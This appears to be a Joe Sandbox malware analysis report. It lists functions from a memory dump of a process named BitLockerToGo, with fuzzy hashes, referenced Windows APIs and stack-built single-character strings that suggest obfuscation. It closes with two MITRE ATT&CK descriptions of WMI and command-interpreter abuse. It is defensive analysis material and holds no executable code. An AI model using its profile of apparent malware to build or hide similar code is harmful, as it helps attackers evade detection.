Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e259438895f09d66a2e0219b7aa489580ffb114da24957229f81c567aafcdbf8
Instruction ID: ba21f83f41fdc9bc24f339e719c988655c207d1ebb327df97db449b15a6ce684
Opcode Fuzzy Hash: e259438895f09d66a2e0219b7aa489580ffb114da24957229f81c567aafcdbf8
Instruction Fuzzy Hash: C9A1BC392083019FE714DF28C490A2AB3E1FFD9710F09892DE9858B361EB35EC11CB96

Function 00416E10 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f936f4d54801ed7cc8ee700b5b30e3efc23a718e9d8f773385e951608a5a20de
Instruction ID: 5ddbc55df2184d9c76cfc4a100124af743eabc02583fda89211e916c70e0920b
Opcode Fuzzy Hash: f936f4d54801ed7cc8ee700b5b30e3efc23a718e9d8f773385e951608a5a20de
Instruction Fuzzy Hash: 31B11672608B408FC315DA3CC895366BFE2AB9A214F198A7DD4EBCB792D539D842C711

Function 00434C60 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6417d5a0739e11ef78dc78333d9e9ca86e5ed3eb69e721b00056efc5c11c2e
Instruction ID: 2e429f33a0ad88cfcd10eef72bcd225e9f57155b206efbfff8d070cd0d697d5d
Opcode Fuzzy Hash: 1a6417d5a0739e11ef78dc78333d9e9ca86e5ed3eb69e721b00056efc5c11c2e
Instruction Fuzzy Hash: 5E91D837A2A9914BD718893D4C112EA69434FDB330F3ED32AB9B6CB3E5D62C98134355

Function 00431980 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef889015e91f7a3a7656171532d6b63e5eff0524738f0c9b0c8242826e87780
Instruction ID: 090cc3e91c5c5f23b62c23ddda15969e17fee4cb1b9351efacd022cd0205b599
Opcode Fuzzy Hash: 3ef889015e91f7a3a7656171532d6b63e5eff0524738f0c9b0c8242826e87780
Instruction Fuzzy Hash: 77B12776604B818FC3158B38C8903A6BFE2AFDA314F19C56DC5E64B3A6DA34A446C746

Function 00432D80 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f91020c104d948fd6ca35f7c7b0217213e65d5d40ba504073df545314a35f7
Instruction ID: be027bfcb4a7fe49726e46eacbac2cc4faf19abedfe8b7f9d84009e059e57d67
Opcode Fuzzy Hash: a3f91020c104d948fd6ca35f7c7b0217213e65d5d40ba504073df545314a35f7
Instruction Fuzzy Hash: 21A17871A08B808FD311CF3CC881366BFE2AFDA314F18896DC5DA8B756D679A845C746

Function 004331DE Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1972d064372f1a8ddea7434840d6bcfa4e9ee46c1fa76510e1d4b6482ac3fa97
Instruction ID: bcda9e8415479ee40f19e9e80fe3d6a48c78db1ac40f10e646f2a910e850edc6
Opcode Fuzzy Hash: 1972d064372f1a8ddea7434840d6bcfa4e9ee46c1fa76510e1d4b6482ac3fa97
Instruction Fuzzy Hash: F8A13875A08B808FD3118F3CC890356BFE2AFDA314F18C96DC5DA8B752D639A846C746

Function 00415BD8 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28fbd0b2d4ea7e8e1d356cb1e496e8a03edc0a3e664a4e663dfa5add14334f18
Instruction ID: 8b88f05288e0dbfcdffefaf95079516d0a169754cd09b1d68158efb6df00cf45
Opcode Fuzzy Hash: 28fbd0b2d4ea7e8e1d356cb1e496e8a03edc0a3e664a4e663dfa5add14334f18
Instruction Fuzzy Hash: D791DB75604B808FC315CF38C8513A6BBE2AFDA310F198A6ED5E6C7396D6399446C711

Function 00434F80 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4753bef8e804fb3fdf58eee093f624c007ff2085615c209a9fa45b6515431ff0
Instruction ID: fc09dfcb9d2e853597f5dfea5dc03bf57225b2c6f9123a47976954bd30d0b3b0
Opcode Fuzzy Hash: 4753bef8e804fb3fdf58eee093f624c007ff2085615c209a9fa45b6515431ff0
Instruction Fuzzy Hash: FD711737B19A8147C7248E3C4C813AAAA635BDB334F3DD37AD5758B3D5C62A88074385

Function 00408DA0 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286e06cd512a33d808de0dcdeb671331db0dc568135e9c69ddb726155eaac873
Instruction ID: 869e3a8b7bdb359d686f0477169337f75954243f96b56d852cb1288c1c6b0d74
Opcode Fuzzy Hash: 286e06cd512a33d808de0dcdeb671331db0dc568135e9c69ddb726155eaac873
Instruction Fuzzy Hash: 1971A879609201CFD708CF14D4902AAB7E2FBCA316F08C57DE88887294C775D955EB85

Function 0042BE10 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7f27538ed38b588a65697a6c688afa69ab7ea5c5d5c3f46dea42ac76e1bcfb
Instruction ID: 082b6e822946ea14a8e62a40a395a458f01001e114eb7053a7dabe4b740f4a23
Opcode Fuzzy Hash: 1b7f27538ed38b588a65697a6c688afa69ab7ea5c5d5c3f46dea42ac76e1bcfb
Instruction Fuzzy Hash: E951CF717246054BC715CE2CAA8062BB3D2ABC5314FAE8A3AD585C7391DB78EC02CB95

Function 00439940 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f367f8f5ecc45097846795fd34e8c8963d6acf5eabfc43f7f435ff06ce4ba9ef
Instruction ID: 9430227283a1cd4a804fe603d0fd427178992cd2383e60ab35571a95b4e15be2
Opcode Fuzzy Hash: f367f8f5ecc45097846795fd34e8c8963d6acf5eabfc43f7f435ff06ce4ba9ef
Instruction Fuzzy Hash: 00517CB15087548FE314DF69D89435BBBE1BBC8318F044A2EE4E987350E379DA088F86

Function 00405820 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b9628c1fd3a7af3e7b851a87d3cce98a572a95508a51e7ee5e35bc07ab5006
Instruction ID: 6fa81707170a7b0eec34b7c549ef7d1de648c0191335202d19104e511ca05f9f
Opcode Fuzzy Hash: a9b9628c1fd3a7af3e7b851a87d3cce98a572a95508a51e7ee5e35bc07ab5006
Instruction Fuzzy Hash: CB51C0B5A042009FC714EF18D880927B7A1FF84328F19467EE899AB392D735EC51CF95

Function 004291E0 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a6c19f95b059f09ec2aadc1618104c657c5ada8ce8c1bbece9e2577c0d72b62
Instruction ID: 0fd299d650ed68ac873b9a29bb7fbe171bdb28a7b9e908c8c1298a36ff445de3
Opcode Fuzzy Hash: 4a6c19f95b059f09ec2aadc1618104c657c5ada8ce8c1bbece9e2577c0d72b62
Instruction Fuzzy Hash: 1E41DD325197238BC324DF68C4801ABB3B2FF9A784B9A896CC5805B334DB756C62D785

Function 00444380 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b30be3330aa3a9b0776dd9b3a63c4cc084a984c5573858b65a5c04746aedeb5a
Instruction ID: d8175d673cc7335d824d045451b58485fcddcae10ae5620f16eb342d1db79df6
Opcode Fuzzy Hash: b30be3330aa3a9b0776dd9b3a63c4cc084a984c5573858b65a5c04746aedeb5a
Instruction Fuzzy Hash: 73415839744300AFF7248B58DCC1B3BB7A6EBD9704F29402DE6815B7A1D675AC00C78A

Function 0043B170 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d624a46ec4e71eabbd80c37bbad157a9d24962d0d9c9ffba726a93ffd2bd3c95
Instruction ID: a6169620d5a1696827cd8f84d74400514db1317b9fd11854ebdf9f64215e6560
Opcode Fuzzy Hash: d624a46ec4e71eabbd80c37bbad157a9d24962d0d9c9ffba726a93ffd2bd3c95
Instruction Fuzzy Hash: D8314A76B043046BE710A9659C85F3B729ADBC8758F04057EFE4493252F739EC0183E6

Function 0041C6E0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b715797aa34ff3df19708ed0b662cc76d9dc44af87f24b806e805beb1256d6
Instruction ID: ab10e966be47ece3002b41b3827003e7ca7586d7d52b0e385e3b598e06569719
Opcode Fuzzy Hash: 69b715797aa34ff3df19708ed0b662cc76d9dc44af87f24b806e805beb1256d6
Instruction Fuzzy Hash: EA4106745453019BD3249F14CC82BE7B7E4EF86721F004A29F9959B3D1E3B8D941CBAA

Function 0040C960 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e39b47d5e8a9fdadff90607e363d12ddf690496f365585e828c43316a0f8579
Instruction ID: 6806c5bbc4d6b822e97fdcaec603f9dae13aeb23598a5c10dbecc01c31c55fc2
Opcode Fuzzy Hash: 2e39b47d5e8a9fdadff90607e363d12ddf690496f365585e828c43316a0f8579
Instruction Fuzzy Hash: D9317A299492E586C332CA3D84E016EBF906D972247A943FFCCF11F3C3C556898687E5

Function 0041C8CE Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb1041f84a4648d79a0668f75aff97b8991a851480defd9ebff2808c4dda2e0
Instruction ID: 561eeec7ef4372a3df09e76981c1185a624b11daafb68e3f07fe16c596ccf13b
Opcode Fuzzy Hash: abb1041f84a4648d79a0668f75aff97b8991a851480defd9ebff2808c4dda2e0
Instruction Fuzzy Hash: 733191B15483408BC7349F14C8923EBB7B1FFA6354F14991DE4C95B391E3788981CB9A

Function 00409F9C Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cfa06287c729573f0fa1a2144b268d937de13fabdac116ac4e1ee5acee0f7c2
Instruction ID: a23067ac09b5581a4e58ab0a46abe5f12fc36fbf8535fe260c57862b3a94e6bf
Opcode Fuzzy Hash: 0cfa06287c729573f0fa1a2144b268d937de13fabdac116ac4e1ee5acee0f7c2
Instruction Fuzzy Hash: C121A536B106604BE3448F65DCD42577353FBCA224F0E8239EA96A73E5CA74E811D645

Function 00437CA0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 6ade34961fb6eb55b73b66c7245ba825150ca2b3c80ec9725d78a0205780844b
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: BD11E973A091D80EC3268D3C8400575BFA31B97635F19639AF4F59B2D2D6268D8B8359

Function 00440E3A Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc57866d1e81e6a0e886b15dfe649725a339f2de6721dcbe9a3cdc7b8a74282c
Instruction ID: 124000ce79dcdd71ba2bb92ad96e4b748c8b16b76f27859204af7460fe27bfba
Opcode Fuzzy Hash: dc57866d1e81e6a0e886b15dfe649725a339f2de6721dcbe9a3cdc7b8a74282c
Instruction Fuzzy Hash: 24118F386056408FC70CDB28D47162FBAB2FB96205F94997EE193D7B64C7389412DB4A

Function 00409FA8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de02bdcef325e87cc3746cc2ccd63ccb188393f32493fd9b4fdb276d0de50aa
Instruction ID: e21fec2d1c0e6720863992e8347f6a131f7453ff00a14f639ac9053343f2b202
Opcode Fuzzy Hash: 2de02bdcef325e87cc3746cc2ccd63ccb188393f32493fd9b4fdb276d0de50aa
Instruction Fuzzy Hash: BA11B136B10A604BE3448F65DCD42667353EB8A220F0E8234EA96AB3E5CA30EC11D685

Function 0042DE70 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84c3b131bcf499d63e6b80aa2f1beace20ffa960dffd1ad22babe7e1f8cb60c
Instruction ID: d66ca4475af4d35a29a52c68c2a69bee92f31811c60477103741a86aac2cde38
Opcode Fuzzy Hash: f84c3b131bcf499d63e6b80aa2f1beace20ffa960dffd1ad22babe7e1f8cb60c
Instruction Fuzzy Hash: 8F01B5F2B00B1187D720AF51A4C0727B3A96FA0708F59413ED4055B342DB79EC08C39D

Function 0043FAD0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 182ff49e939f1398294b9512b1f3ca232d73da5c2630492eafcdb88c1e4c075a
Instruction ID: 58e8886864d4165c492f53d94ac2ec571c49354c70431e2038b14aa9fdf686d5
Opcode Fuzzy Hash: 182ff49e939f1398294b9512b1f3ca232d73da5c2630492eafcdb88c1e4c075a
Instruction Fuzzy Hash: 901101B4A193804FD784DF25D89052BBAB4EB8A348F88AC2CE492E7350D738D5028F06

Function 00432088 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c33f2bce48ae135c24f5ce7bd25ad00db60cde2b19ebbe6d6e038a32b2be15
Instruction ID: 73ba8bc07e1ba15521088f6cccb2f0558f02181132062fbfe265993b15d3b92d
Opcode Fuzzy Hash: e9c33f2bce48ae135c24f5ce7bd25ad00db60cde2b19ebbe6d6e038a32b2be15
Instruction Fuzzy Hash: 6A11E0B45087408FD750DF28C48878ABBE0FB09304F1488ADE899CB346D77AE58ACB91

Function 0042AA60 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ccec21401edb20b9aceaf9688996d9eeb2ecb12b31d1f3d13a469f16b764ac
Instruction ID: ca966f37c3a7dbe55b207b2fb1d7652738fa600dc0873f2892cf3005b09500ed
Opcode Fuzzy Hash: 96ccec21401edb20b9aceaf9688996d9eeb2ecb12b31d1f3d13a469f16b764ac
Instruction Fuzzy Hash: 6501BCB090D3849BD3449F65C8A571BFFE4AB82318F906D2DF1E28B290C7B98409CF56

Function 00441648 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8a8fe6d65e0ef33865518a253835d798b8716f646b673b848b87c0ad7caa14
Instruction ID: dea776a36a39075b24f8f6c16698ee402748b83085f9428075cd22d80d1f5197
Opcode Fuzzy Hash: fd8a8fe6d65e0ef33865518a253835d798b8716f646b673b848b87c0ad7caa14
Instruction Fuzzy Hash: 78F0A0B6C0A3908FD304DF22D5154A7BAA3ABEA611F56D93CC5D1ABB50CB359800DBC7

Function 0043C6D0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: f7bff9853d72cc689f6dce1b47a59223474ca62ca5c62c8c45c1f9517843fa2b
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 2DD05E2160862146AB648E29A44197BF7E0EA8BB11F49A55FF582F3248D234DC41D2AD

Function 004344AC Relevance: 52.7, APIs: 1, Strings: 29, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043457C

Strings

i, xrefs: 0043469D
a, xrefs: 004346DD
{, xrefs: 0043460D
s, xrefs: 0043464D
}, xrefs: 0043463D
w, xrefs: 0043466D
k, xrefs: 0043468D
E, xrefs: 004344BA
I, xrefs: 0043459D
O, xrefs: 004345AD
G, xrefs: 004345ED
C, xrefs: 004345CD
L, xrefs: 004344DA
y, xrefs: 0043461D
q, xrefs: 0043465D
X, xrefs: 00434615
m, xrefs: 004346BD
E, xrefs: 004344CA
c, xrefs: 004346CD
E, xrefs: 004345FD
e, xrefs: 004346FD
M, xrefs: 004345BD
o, xrefs: 004346AD
g, xrefs: 004346ED
A, xrefs: 004345DD
V, xrefs: 00434665
u, xrefs: 0043467D
d, xrefs: 004345F5
0, xrefs: 0043480C

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: 0$A$C$E$E$E$G$I$L$M$O$V$X$a$c$d$e$g$i$k$m$o$q$s$u$w$y${$}
API String ID: 2525500382-1585318030
Opcode ID: 1725aad4737aaae7f317832f14c23f5d8215ec4c0be4ffa9d4f1ac8590fd715f
Instruction ID: bc8319635e7ec1087d55e7204a5246f8d78f84ad8ba8ba7a2beea8eaa9d0cc59
Opcode Fuzzy Hash: 1725aad4737aaae7f317832f14c23f5d8215ec4c0be4ffa9d4f1ac8590fd715f
Instruction Fuzzy Hash: 8291096150DBC18AE332C73C880879BBED12BA7224F188B9DD5ED9B2D2C7B90445D767

Function 004340F6 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 104COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043413C

Strings

y, xrefs: 00434159
G, xrefs: 004341B3
C, xrefs: 004341C7
K, xrefs: 0043419F
u, xrefs: 0043416D
q, xrefs: 00434181
O, xrefs: 0043418B
A, xrefs: 004341D1
E, xrefs: 004341BD
s, xrefs: 00434177
M, xrefs: 00434195
I, xrefs: 004341A9
@, xrefs: 004341CC
w, xrefs: 00434163

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: @$A$C$E$G$I$K$M$O$q$s$u$w$y
API String ID: 1927566239-3739842773
Opcode ID: 15324b135b59c7a619bb96e9100ef1d9eddda05e6b7ce0652f1398ce6b05658a
Instruction ID: cfa59d3dd61b8fc2c8280ba4920ca822f29ebbc03a68f38a0becb94220d4ac66
Opcode Fuzzy Hash: 15324b135b59c7a619bb96e9100ef1d9eddda05e6b7ce0652f1398ce6b05658a
Instruction Fuzzy Hash: 8A51247150C7D08AE325CB28845879FBFD16BE6324F184A9DE4E94B3E2C7B88845C767

Function 004342D4 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 004342E2
VariantInit.OLEAUT32 ref: 004342F5

Strings

!, xrefs: 00434367
8, xrefs: 00434335
7, xrefs: 0043435D
?, xrefs: 00434371
-, xrefs: 0043433F
3, xrefs: 00434349
2, xrefs: 0043432B
-, xrefs: 00434317
=, xrefs: 00434321
(, xrefs: 0043430D

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$($-$-$2$3$7$8$=$?
API String ID: 2610073882-1101923984
Opcode ID: 55881a7127c08f3ae581755080e2831ff2bafeda491c0d68bfe4e442cdeeea3e
Instruction ID: ce8d9142a08082602957e39f3b723dd1a5a75d625bc2628654832b93868514b7
Opcode Fuzzy Hash: 55881a7127c08f3ae581755080e2831ff2bafeda491c0d68bfe4e442cdeeea3e
Instruction Fuzzy Hash: DE41487150C7C18FD3219B38884869EBFE16BA7324F094A9DE5E4873D2C7B58506C753

Function 0041CBE6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 273threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 0041CCA3

Strings

;:54, xrefs: 0041CD97
TU, xrefs: 0041CE9F

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ProcessThreadWindow
String ID: ;:54$TU
API String ID: 1653199695-2129887498
Opcode ID: 4af5c4ad50dbf8e3ea00b90cc7a03d7b7d5ae7b00e7b789710216c4470d5e8ae
Instruction ID: 994451c890a539b70b135d86ab13cbbfb130f4c9854e9402de8351a222cc8c75
Opcode Fuzzy Hash: 4af5c4ad50dbf8e3ea00b90cc7a03d7b7d5ae7b00e7b789710216c4470d5e8ae
Instruction Fuzzy Hash: 8491CE75608301DFD714CF24DC8166BB7B2FF8A719F19882DE584872A1E738E845CB8A

Function 004356A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004356D9
GetSystemMetrics.USER32 ref: 004356E8

Strings

, xrefs: 00435793

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 3dcdef9236adf8ca386dc6fb97340a86e3694599f7ba400ddce7260dc1c74294
Instruction ID: 9732a33b7570d1acdeca4753070807439da1dc5417158f41187a2c532eae33b3
Opcode Fuzzy Hash: 3dcdef9236adf8ca386dc6fb97340a86e3694599f7ba400ddce7260dc1c74294
Instruction Fuzzy Hash: 9531A1B49143048FDB40EF7CD98561EBBF4BB89304F11856DE488DB360DB70A948CB96

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

